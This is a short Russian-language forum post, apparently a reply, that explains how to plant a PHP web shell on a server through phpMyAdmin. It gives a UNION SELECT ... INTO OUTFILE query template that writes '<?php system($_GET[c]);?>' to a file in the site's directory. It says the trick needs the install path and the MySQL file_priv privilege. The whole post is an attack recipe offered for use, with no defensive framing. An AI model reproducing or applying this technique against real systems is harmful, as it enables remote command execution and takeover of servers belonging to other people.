Читай статью про MySQL у меня в подписи.

Вкратце:

В phpmyadmin есть функция выполнения произвольного SQL кода. Тебе нужно знать лишь установочную дирректорию сайта. Дальше лазишь по phpmyadmin и находишь таблицу и смотришь колличество ее столбцов. и составляешь запрос по типу

UNION SELECT 1,2,3...кол-во столбцов и в последнем <?php system($_GET[c]);?> FROM имя_таблицы INTO OUTFILE тут_в_одинарных_ковычках_пу ть_к_файлу_куда_писать


НО! данная вещь сработает только если у твоего юзера есть права file_priv